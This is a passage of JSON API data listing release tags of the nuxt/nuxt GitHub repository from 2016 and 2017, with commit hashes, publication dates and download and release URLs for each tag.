nuxt/tags/v0.9.9/manifests"},{"name":"v0.9.8","sha":"e7f0200a58f17d429b00641d015e6f7f87f99fd0","kind":"commit","published_at":"2017-02-10T01:22:33.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.8/manifests"},{"name":"v0.9.7","sha":"8d17d20dba2a81072173c68fa774d7a49cae716a","kind":"commit","published_at":"2017-01-30T11:41:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.7/manifests"},{"name":"v0.9.6","sha":"1556787e0164bdb4b15542dedf32762c481f274c","kind":"commit","published_at":"2017-01-15T16:33:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.6/manifests"},{"name":"v0.9.5","sha":"42a3b007514eea3e87a4bd0c083dad6524ecfead","kind":"commit","published_at":"2016-12-27T16:07:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.5/manifests"},{"name":"v0.9.4","sha":"05be1ed6b12e7d88fe7adc2af5ed0568cf40ddb0","kind":"commit","published_at":"2016-12-25T20:15:17.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.4/manifests"},{"name":"v0.9.3","sha":"1fc685a88037fdac0b826d8d814fcd1c3b320fda","kind":"commit","published_at":"2016-12-24T18:00:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.3/manifests"},{"name":"v0.9.2","sha":"2a9519e7203004955ffc70f0c8f762e6afeb9816","kind":"commit","published_at":"2016-12-23T12:09:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.2/manifests"},{"name":"v0.9.1","sha":"baaaefbf2c76f362fd0be9f34c1444e439e8c746","kind":"commit","published_at":"2016-12-20T11:55:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.1/manifests"},{"name":"v0.9.0","sha":"004e21b929b901ae54d92abf339c51a9d666b373","kind":"commit","published_at":"2016-12-19T19:37:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.0/manifests"},{"name":"v0.8.8","sha":"803b21bf17a21bac5eb97d84de35fa7d08c3b73e","kind":"commit","published_at":"2016-12-09T19:10:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.8/manifests"},{"name":"v0.8.6","sha":"d482711cbe2a9f50a6a4804bdf1292739dd581ab","kind":"commit","published_at":"2016-12-09T12:52:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.6/manifests"},{"name":"v0.8.5","sha":"151bd73b8250816c3918e52777e9a7387df7be4a","kind":"commit","published_at":"2016-12-09T12:46:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.5/manifests"},{"name":"v0.8.4","sha":"e254e1117736f73a3455b0f795e9f9bd9e0364ab","kind":"commit","published_at":"2016-12-08T20:15:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.4/manifests"},{"name":"v0.8.3","sha":"4895433d3383407dd243acc0718bc9fa33ad28ff","kind":"commit","published_at":"2016-12-08T10:43:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.3/manifests"},{"name":"v0.8.2","sha":"40e28de226dbefd24e228c801b28892ca91e33e4","kind":"commit","published_at":"2016-12-07T22:58:51.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.2/manifests"},{"name":"v0.8.1","sha":"78a2c5afe747c7009ff618a79f14ddf83c19efed","kind":"commit","published_at":"2016-12-07T22:44:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.1/manifests"},{"name":"v0.8.0","sha":"be5e8c118d1415e33031772daca422a0fae511bf","kind":"commit","published_at":"2016-12-07T18:43:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.0/manifests"},{"name":"v0.7.9","sha":"8801327db20c2e5daa594a7d8ad95d7a2a582a14","kind":"commit","published_at":"2016-12-04T18:16:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.9/manifests"},{"name":"v0.7.8","sha":"ddbffcc8af4393e14cc44daa94b4a27a21c6fadf","kind":"commit","published_at":"2016-12-01T18:09:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.8/manifests"},{"name":"v0.7.7","sha":"fdc430b23bac4a0cf86b0bc0da7828a573a0176d","kind":"commit","published_at":"2016-11-28T16:28:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.7/manifests"},{"name":"v0.7.6","sha":"53499f2a6b0ebf7514f984f6d81ce76ab9aaeb09","kind":"commit","published_at":"2016-11-27T17:46:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.6/manifests"},{"name":"v0.7.5","sha":"3ed1340d568c36f65bfe66618f9ac8119e8408de","kind":"commit","published_at":"2016-11-27T17:13:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.5/manifests"},{"name":"v0.7.4","sha":"bcf291b54761b64c271573e045e9275f189c3bea","kind":"commit","published_at":"2016-11-25T16:58:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.4/manifests"},{"name":"v0.7.3","sha":"cb1994319cd920b77181d852daf79a9c2c51b25c","kind":"commit","published_at":"2016-11-25T14:37:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.3/manifests"},{"name":"v0.7.2","sha":"4b9fb87c860f69d4b5044533aee0c16310b10aa1","kind":"commit","published_at":"2016-11-24T13:41:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.2/manifests"},{"name":"v0.7.1","sha":"d984c8803d9dd1e58c56a08b97f7d38ba5cb92b7","kind":"commit","published_at":"2016-11-24T12:16:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.1/manifests"},{"name":"v0.7.0","sha":"40515ac91a9e4ae5fd7b4a37c75de2843f6d3fbc","kind":"commit","published_at":"2016-11-24T00:47:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.0/manifests"},{"name":"v0.6.9","sha":"5b35834f42aa6cea3724f098787587a86ec6f4c3","kind":"commit","published_at":"2016-11-23T13:05:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.9/manifests"},{"name":"v0.6.8","sha":"57b55dc5126ae271f3b87b2d3ffdac49055e355e","kind":"commit","published_at":"2016-11-22T23:47:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.8/manifests"},{"name":"v0.6.7","sha":"57b55dc5126ae271f3b87b2d3ffdac49055e355e","kind":"commit","published_at":"2016-11-22T23:47:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.7/manifests"},{"name":"v0.6.6","sha":"fc598ea66e1249645ed3677d8725efc1c048ba2d","kind":"commit","published_at":"2016-11-22T23:27:07.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.6/manifests"},{"name":"v0.6.5","sha":"2400fabceb3b76b756efc8ede2919a4ccb088345","kind":"commit","published_at":"2016-11-21T18:53:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.5/manifests"},{"name":"v0.6.0","sha":"edd0227e746c2ecde781915bd8c59e98f399439a","kind":"commit","published_at":"2016-11-21T13:15:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.0/manifests"},{"name":"v0.5.2","sha":"b8436b067f8375bb91e4b99cc528661eaa27c43c","kind":"commit","published_at":"2016-11-20T11:23:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.2/manifests"},{"name":"v0.5.3","sha":"b8436b067f8375bb91e4b99cc528661eaa27c43c","kind":"commit","published_at":"2016-11-20T11:23:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.3/manifests"},{"name":"v0.5.1","sha":"8cbbaeaf838e33bb6e23f06e15724b39042c5206","kind":"commit","published_at":"2016-11-20T10:37:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.1/manifests"},{"name":"v0.5.0","sha":"e48f8250a084202fbc492df55f13e3803e2b74cf","kind":"commit","published_at":"2016-11-18T13:45:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.0/manifests"},{"name":"v0.4.9","sha":"d4b8bc4f022459c976b41cb9845be38759a0481a","kind":"commit","published_at":"2016-11-18T09:38:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.9/manifests"},{"name":"v0.4.8","sha":"d928c9e5970e9d08eec61fe6770325d8c74e6d5b","kind":"commit","published_at":"2016-11-18T08:19:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.8/manifests"},{"name":"v0.4.7","sha":"49f67566c2d74a661421be1589279b316dcc9e49","kind":"commit","published_at":"2016-11-17T21:12:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.7/manifests"},{"name":"v0.4.6","sha":"06edc8029b796b8008fe52a682159636d10f3e7a","kind":"commit","published_at":"2016-11-17T13:02:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.6/manifests"},{"name":"v0.4.4","sha":"2677afb46fc4a950d62f32e6172aeaa2fdcc5a8b","kind":"commit","published_at":"2016-11-17T10:57:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.4/manifests"},{"name":"v0.4.3","sha":"a98e6d4e9bda0491bf8f32815701f42f28c793a2","kind":"commit","published_at":"2016-11-16T17:41:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.3/manifests"},{"name":"v0.4.2","sha":"d2c0f01593e669147396ff25c4a017372a8390ea","kind":"commit","published_at":"2016-11-16T17:06:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.2/manifests"},{"name":"v0.4.1","sha":"b1546682ef7ce3f9ead26f328417d2589875ef46","kind":"commit","published_at":"2016-11-16T16:55:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.1/manifests"},{"name":"v0.4.0","sha":"c5c9448a264327adab3920d07937f819f5c0a3c4","kind":"commit","published_at":"2016-11-11T14:30:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.0/manifests"},{"name":"v0.3.8","sha":"4b0b83b782ba2c865722dbd80521ca6aa1d63b4a","kind":"commit","published_at":"2016-11-11T00:35:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"4b0b83b782ba2c865722dbd80521ca6aa1d63b4a","kind":"commit","published_at":"2016-11-11T00:35:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"5b0ff5617b97d050983358879b6a70835d63be8a","kind":"commit","published_at":"2016-11-10T23:01:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"cb7406cba6a42a4009660569c921f7fdca5bb209","kind":"commit","published_at":"2016-11-10T18:34:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"ea1c5dee15ed92add7e8f69bd523cb090161194e","kind":"commit","published_at":"2016-11-10T16:16:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.4","html_url":"https:/